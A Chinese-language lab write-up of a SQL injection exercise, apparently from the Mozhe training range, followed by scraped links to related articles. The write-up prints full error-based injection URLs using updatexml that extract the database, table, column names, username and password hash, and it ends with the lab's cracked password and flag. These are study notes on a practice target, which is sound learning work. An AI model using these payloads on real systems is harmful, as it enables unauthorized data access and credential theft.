这个是今天拿下的靶场,这是我作为小白学习的第二个靶场,做一下笔记

已知IP地址为:219.153.49.228,端口号为41280,访问了之后是下面的页面

看到这个页面之后,我进入了后台,查看之后知道了加new_list.php?id=1进行测试看是否有注入点

输入之后页面显示如下
接下来我输入’显示说明存在注入点
所以可以开始进行爆库了,输入http://219.153.49.228:41280/new_list.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1) --+
得到数据库名为stormgroup,如下图所示

接下来是爆表,http://219.153.49.228:41280/new_list.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=%20%27stormgroup%27%20limit%200,1),0x7e),1)–+,0x7e),1) --+
得到的表名是member

接下来是爆字段名,http://219.153.49.228:41280/new_list.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema%20=%20%27stormgroup%27%20and%20table_name%20=%20%27member%27),0x7e),1) --+
得到name,password,status

猜测用户名是mozhe,为了准确还是爆一下用户名http://219.153.49.228:41280/new_list.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20name%20from%20member%20limit%200,1),0x7e),1) --+
实践证明得到的答案确实是mozhe
越来越激动了,快要接近爆密码了,http://219.153.49.228:41280/new_list.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20password%20from%20member%20limit%201,1),0x7e),1) --+
看到密码爆出来了,很激动,马上进行解密,发现解密不了,有点小失望
想到了之前爆密码爆出两个,所以猜测正确密码是另外一个
http://219.153.49.228:41280/new_list.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20substr(password,32,1)%20from%20member%20limit%201,1),0x7e),1) --+
看到这个傻了,怎么可能,密码不可能才一个字母,看到一个密码那么长,一个那么短,我试着把两个结合一起189c53065f5e0c4101eb8334a3d0653d,最后成功解密出来了,解密结果152794

密码得到之后,马上登陆,蹬蹬蹬~~~密码正确,得到的key为mozhe38886a303969ad3321dbd516a22

SQL注入漏洞测试(报错盲注)笔记相关推荐

  1. 墨者学院-SQL注入漏洞测试(布尔盲注)

    决心按部就班.由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路.本题靶场环境比较简单.也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目.废话 ...

  2. 【SQL注入漏洞-04】布尔盲注靶场实战

    布尔盲注 当我们改变前端页面传输给后台sql参数时,页面没有显示相应内容也没有显示报错信息时,不能使用联合查询注入和报错注入,这时我们可以考虑是否为基于布尔的盲注. 布尔盲注原理: 利用页面返回的布尔 ...

  3. 墨者学院-SQL注入漏洞测试(报错盲注)

    继续攻克SQL注入类题目啦!!!今天的题目环境提示比较明显,也是比较常见的一种SQL注入漏洞类型,继续储备知识,撸起袖子加油干!!! 附上题目链接:https://www.mozhe.cn/bug/d ...

  4. B站小迪安全笔记第十六天-SQL注入之查询方式及报错盲注

    前言: 当进行 SQL 注入时,有很多注入会出现无回显的情况,其中不回显 的原因可能是 SQL 语句查询方式的问题导致,这个时候我们需要用到相 关的报错或盲注进行后续操作,同时作为手工注入时,同时作为 ...

  5. SQL报错盲注绕过云锁

    SQL报错盲注绕过云锁 有锁 还是被拦截了,怎么办? 我们要知道对方负责检测我们的语句是否存在恶意代码,对方是装了一个工具,但是工具运行要占用系统内存,对于这种防护类软件占用系统资源还是比较高的,而对 ...

  6. sql注入 1-1_基于报错的注入

    sql注入 1-1_ 基于报错注入 1.判断是否存在报错注入 通过 id =1 可以看到服务器返回正常页面 通过 id=1 and 1=1 通过 id=1 and 1=2 服务器也返回正常 通过 id ...

  7. SQL注入漏洞测试(参数加密)

    SQL注入漏洞测试(参数加密) <此WEB业务环境对参数进行了AES加密,为了防止参数产生SQL注入,也是防止SQL注入产生的一种方法,但是这种方式就安全了么?1.掌握信息泄露的方式:2.了解A ...

  8. SQL注入之floor报错注入

    SQL注入之floor报错注入 原理 一.count()函数.group by 二.floor()函数 三.rand()函数 四.报错初体验 五.报错注入 1.获取当前数据库 2.获取当前用户 六.靶 ...

  9. 渗透测试——sql注入进阶/基于时间的盲注/一看就会/

    目录 一.注入点判断 注入类型 SQL注入的类型 二.基于时间的时间盲注 什么是时间盲注 sleep()函数 常用函数 三.bWAPP基于时间的盲注实战 一.注入点判断 1.输入一个单引号',因为语句 ...

最新文章

  1. 编译安装pdo mysql_centos 6.5下编译安装php5.6,pdo_mysql问题。
  2. linux获取cpu核数(线程数)
  3. 十大经典排序算法之快速排序及其优化
  4. 见证开户_见证中的发现
  5. CSS选择器学习笔记
  6. 部署mysql MHA集群
  7. linux oops产生原理,kernel panic , Oops 等cpu异常的分析与定位
  8. 一些JavaScript题目
  9. matlab中求解非线性方程组的函数,利用solve函数求解非线性方程组的问题
  10. php和tp中生成二维码电子名片
  11. python安装chardet_Python使用chardet判断字符编码
  12. 耦合矩阵 matlab,耦合矩阵变换(化简)的问题
  13. 易班登陆接口接入实例
  14. 从气电到光伏 新加坡如何走好清洁能源之路?
  15. Gradle 2.0 用户指南翻译——第五十四章. 构建本机二进制文件
  16. bp神经网络预测python人口预测_BP神经网络人口预测程序(matlab实现)
  17. speedoffice表格如何全选表格
  18. ubuntu 16.04 安装nvidia驱动 下载nvidia官方驱动
  19. DM8更换产品授权,更换KEY
  20. 编译原理(1)词法分析程序(C++实现)

热门文章

  1. Shader 学习笔记:杂记
  2. 堆排序(最小堆)C++
  3. 完美世界:影视和游戏,二者为何不可兼得?
  4. 关于spring IoC 学习
  5. 正弦值、余弦值和正切值
  6. 搭建 discus 论坛
  7. 使用Spark分析拉勾网招聘信息(三): BMR 入门
  8. 人工智能-高等数学之导数篇
  9. linux gpu 风扇速度,如何在无头节点上调整NVIDIA GPU风扇速度?
  10. 瑞丽噪声与信噪比的关系_信噪比SNR , Eb/N0 , Es/N0区别与联系之深入剖析